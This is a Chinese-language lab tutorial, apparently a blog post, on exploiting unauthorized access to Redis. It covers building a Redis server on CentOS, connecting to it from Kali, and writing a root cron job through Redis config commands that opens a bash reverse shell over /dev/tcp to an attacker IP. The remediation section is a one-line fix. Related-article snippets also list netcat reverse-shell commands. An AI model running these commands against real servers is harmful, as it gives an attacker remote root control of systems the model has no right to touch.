网络安全——redis未授权访问漏洞写入计划任务反弹shell

本文涉及的产品
云数据库 Tair(兼容Redis),内存型 2GB
Redis 开源版,标准版 2GB
推荐场景:
搭建游戏排行榜
简介: redis未授权访问漏洞的深入利用

今天需要的redis服务安装包已经给你们准备好了,永久有效

链接:https://pan.baidu.com/s/1sBDdewFr6lQn9OoSKTFjLg 
提取码:jgww

这个服务还不错吧,可以给我点个关注吗?

目录

1.搭建redis服务

1.下载redis压缩包 

2.安装redis服务 

3.打开redis服务 

1.开启服务端

2.连接客户端 

2.实操redis未授权访问漏洞 

 1.kali安装redis服务

2.kali利用未授权漏洞远程连接centos的redis服务

3. redis写入计划任务反弹shell

1.设置计划任务

2.获取反弹的shell 

 3.查看计划任务

4.修复


1.搭建redis服务

1.下载redis压缩包

这里就要用到网盘里的redis那个压缩包了,同样需要把他放在centos里面,但是不需要放到centos的根目录了,随便放哪都可以(不可以放回收站哈),这边建议放桌面,我这就跳过步骤了,

同样对这个文件解压即可,但是这里不是用unzip语句了,因为这个是tar格式,所以这里用 tar zvxf命令

解压完之后就会生成一个redis-3.0.4的文件,这就是我们要的

2.安装redis服务

1.cd 到刚才解压的文件里面,直接源码安装即可(就是输入make即可)

2.进入到src文件夹中,找到里面存在的redis-cliredis-server文件,这就是redis服务的客户端和服务端

3.打开redis服务

1.开启服务端

在刚才的src文件夹中输入下面的代码来打开redis服务的服务端

./redis-server    

成功开启后便是下面这样的界面,这便是开启成功了

 

2.连接客户端

连接客户端只需要新开一个终端,同样进入到src目录下,输入redis-cli即可成功连接 ,出现我线面这个画面就是连接成功了

2.实操redis未授权访问漏洞

这里需要利用到redis的未授权访问漏洞,顾名思义,就是不需要输入账密就可以直接登录,刚才我们搭建的redis也有这个漏洞(因为我们还没配置redis的账密信息),这里就简单讲一下操作

1.kali安装redis服务

这里就需要再开一台kali虚拟机, 在这台虚拟机上也安装redis服务,安装步骤和centos安装redis服务一样

 

2.kali利用未授权漏洞远程连接centos的redis服务

直接进入到src目录下,redis-cli -h centos的ip -p 6379

注意 :6379是redis默认端口,若果你进行了修改这里的命令就要换成你修改的端口

          这里一定要关闭centos的防火墙,不然kali可能连接不上

到这里就成功连接上centos的redis服务了,到此漏洞复现完成

3. redis写入计划任务反弹shell

1.设置计划任务

计划任务理解起来也很简单,就是给电脑设置一个时间和这个时间该做的事,就是给电脑做一个计划,而redis就可以写入计划任务,这也是我们用他来反弹shell的原因

在刚才kali连接centos的redis服务那里输入下面这个指令,操作redis写入计划任务反弹shell,按照下面的指令输入就行

建立计划任务

set x “\n* * * * * /bin/bash -i > /dev/tcp/192.168.1.111/6666 0<&1 2>&1\n”

将计划任务放到定时任务下
config set dir /var/spool/cron/

设置以root用户的身份执行该任务
config set dbfilename root

保存
save

注意: 这里反弹shell的方法是通过nc的bin/bash的方式来反弹centos的shell到kali

2.获取反弹的shell

因为刚才设置计划任务是将shell反弹到kali的6666端口上,所以我们用nc来监听6666端口,看是否能成功反弹

可以看到这里是能够正常返回shell的

3.查看计划任务

因为这是靶场环境,我们也可以在centos查看我们写入的计划任务,输入图中的指令就可以了

可以看到跟我们写入的计划任务一样

4.修复

这个漏洞修复就比较简单,设置一下redis的账密就行了

相关实践学习
基于Redis实现在线游戏积分排行榜
本场景将介绍如何基于Redis数据库实现在线游戏中的游戏玩家积分排行榜功能。
云数据库 Redis 版使用教程
云数据库Redis版是兼容Redis协议标准的、提供持久化的内存数据库服务,基于高可靠双机热备架构及可无缝扩展的集群架构,满足高读写性能场景及容量需弹性变配的业务需求。 产品详情:https://www.aliyun.com/product/kvstore &nbsp; &nbsp; ------------------------------------------------------------------------- 阿里云数据库体验:数据库上云实战 开发者云会免费提供一台带自建MySQL的源数据库&nbsp;ECS 实例和一台目标数据库&nbsp;RDS实例。跟着指引,您可以一步步实现将ECS自建数据库迁移到目标数据库RDS。 点击下方链接,领取免费ECS&amp;RDS资源,30分钟完成数据库上云实战!https://developer.aliyun.com/adc/scenario/51eefbd1894e42f6bb9acacadd3f9121?spm=a2c6h.13788135.J_3257954370.9.4ba85f24utseFl
相关文章
|
7月前
|
Shell Linux Windows
nc简单反弹shell
该内容描述了在Windows和Linux环境中使用`nc`(Netcat)工具建立反弹shell的过程。在Windows上,反弹端通过命令`nc -e cmd IP 端口`将控制权反弹到指定IP;控制端则运行`nc -lvvp 端口`等待连接。在Linux环境下,类似地,使用`nc -l -v -p 端口`作为控制端,而被控端用`nc 目标IP 端口`进行连接。文中还包含相关截图以辅助说明。
208 0
|
7月前
|
监控 网络协议 Unix
Linux命令-nc(端口监控、文件传输、反弹shell等)
Linux命令-nc(端口监控、文件传输、反弹shell等)
487 0
|
2月前
|
存储 安全 Shell
上传漏洞利用时,没有回显上传目录怎么连接shell
上传漏洞利用时,没有回显上传目录怎么连接shell
|
5月前
|
安全 NoSQL Java
网络安全-----Redis12的Java客户端----客户端对比12,Jedis介绍,使用简单安全性不足,lettuce(官方默认)是基于Netty,支持同步,异步和响应式,并且线程是安全的,支持R
网络安全-----Redis12的Java客户端----客户端对比12,Jedis介绍,使用简单安全性不足,lettuce(官方默认)是基于Netty,支持同步,异步和响应式,并且线程是安全的,支持R
|
6月前
|
网络协议 Linux Shell
基础入门-反弹SHELL&不回显带外&正反向连接&防火墙出入站&文件下载
基础入门-反弹SHELL&不回显带外&正反向连接&防火墙出入站&文件下载
|
7月前
|
网络协议 Shell Linux
LabVIEW 在NI Linux实时设备上访问Shell
LabVIEW 在NI Linux实时设备上访问Shell
102 0
|
7月前
|
Shell Linux C语言
【Shell 命令集合 文件管理】Linux 创建一个空的文件或者更新文件的访问和修改时间戳 touch命令使用指南
【Shell 命令集合 文件管理】Linux 创建一个空的文件或者更新文件的访问和修改时间戳 touch命令使用指南
86 0
|
7月前
|
NoSQL Shell Redis
Docker【应用 02】借助Docker部署Redis集群(Docker网卡创建+6个Redis集群搭建shell脚本)
Docker【应用 02】借助Docker部署Redis集群(Docker网卡创建+6个Redis集群搭建shell脚本)
124 0
|
Shell
反弹shell脚本(php-reverse-shell)
反弹shell脚本(php-reverse-shell)
321 0
|
8天前
|
SQL 安全 网络安全
网络安全与信息安全:知识分享####
【10月更文挑战第21天】 随着数字化时代的快速发展,网络安全和信息安全已成为个人和企业不可忽视的关键问题。本文将探讨网络安全漏洞、加密技术以及安全意识的重要性,并提供一些实用的建议,帮助读者提高自身的网络安全防护能力。 ####
46 17